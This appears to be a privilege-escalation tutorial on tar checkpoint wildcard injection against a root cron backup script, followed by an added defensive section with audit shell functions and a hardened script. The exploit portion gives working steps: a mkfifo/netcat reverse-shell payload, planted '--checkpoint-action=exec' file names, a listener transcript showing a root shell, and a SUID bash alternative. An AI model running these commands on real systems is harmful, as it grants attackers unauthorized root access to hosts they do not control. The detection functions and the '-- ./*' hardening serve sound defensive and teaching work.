Tar comes with a feature called “checkpoints” that allows periodic execution of actions at certain points of the archiving process. An example may be a large tar backup running on a cron job that periodically emails its progress after every 10,000th file has been archived. If that tar job is using a wildcard to back up a directory, then we can inject our own checkpoint into the tar job that will execute our own code.
Exploit
You find this cron job running as super user every 5 minutes. The cron is utilising wildcards and the /home/backups folder is writable. Perfect to insert a tar checkpoint.
-rw-r--r-- 1 root root 62 Oct 24 20:52 backup_files.sh
#!/bin/bash
cd /home/backups
tar cvf /tmp/backup_files.tar *
Steps
- Create the malicious payload.
echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" > /home/backups/runme.sh
- Create the checkpoint.
touch /home/backups/--checkpoint=1
- Create the action to perform when the checkpoint is hit.
touch /home/backups/--checkpoint-action=exec=sh\ runme.sh
Now the next time the cron runs the backup_files.sh script, the checkpoint will be hit and our runme.sh script will be run with the privileges of the user that runs backup_files.sh.
nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55592
# id
uid=0(root) gid=0(root) groups=0(root),141(kaboxer)
For a less noisy payload you can copy /bin/bash to /tmp with the SUID bit set.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/backups/runme.sh
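Two checks a defender can run to catch this on a host, added here as an example and not part of the original post: whether a cron script calls tar with an unprotected wildcard, and whether a backup directory already holds option-like file names. It also writes out the hardened form of backup_files.sh. Everything under $DEMO is constructed sample data.

```shell
# Audit helpers (added example, not from the original post).

# 1. Does a script run tar with a bare "*" argument and no "--" separator?
#    Exit 0 = risky, 1 = not found.
tar_wildcard_risky() {
    grep -E '(^|[;&|[:space:]])tar[[:space:]]' "$1" \
      | grep -vE '[[:space:]]--([[:space:]]|$)' \
      | grep -qE '(^|[[:space:]])\*([[:space:]]|$)'
}

# 2. How many entries in a directory have option-like names ("-something")?
#    Such names are the tell-tale of planted --checkpoint files.
option_like_files() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | wc -l | tr -d ' '
}

# --- constructed demo data ---------------------------------------------
DEMO=$(mktemp -d)
mkdir "$DEMO/backups"

# Vulnerable script, as on the page
cat > "$DEMO/backup_files.sh" <<'EOF'
#!/bin/bash
cd /home/backups
tar cvf /tmp/backup_files.tar *
EOF

# Hardened version: "--" ends option parsing, and "./*" keeps every
# expanded name from starting with "-" even if "--" were dropped later.
cat > "$DEMO/backup_files_hardened.sh" <<'EOF'
#!/bin/bash
cd /home/backups || exit 1
tar cvf /tmp/backup_files.tar -- ./*
EOF

# Planted checkpoint files (names only; nothing is executed here)
touch -- "$DEMO/backups/--checkpoint=1" \
         "$DEMO/backups/--checkpoint-action=exec=sh runme.sh"

audit_demo() {
    if tar_wildcard_risky "$DEMO/backup_files.sh"; then
        echo "RISKY: $DEMO/backup_files.sh uses an unprotected wildcard"
    fi
    tar_wildcard_risky "$DEMO/backup_files_hardened.sh" || echo "OK: hardened script"
    echo "option-like names in $DEMO/backups: $(option_like_files "$DEMO/backups")"
}
audit_demo
```

Run the same two functions over /etc/cron.d, /etc/crontab and the directories those jobs archive; any hit on either check deserves a look.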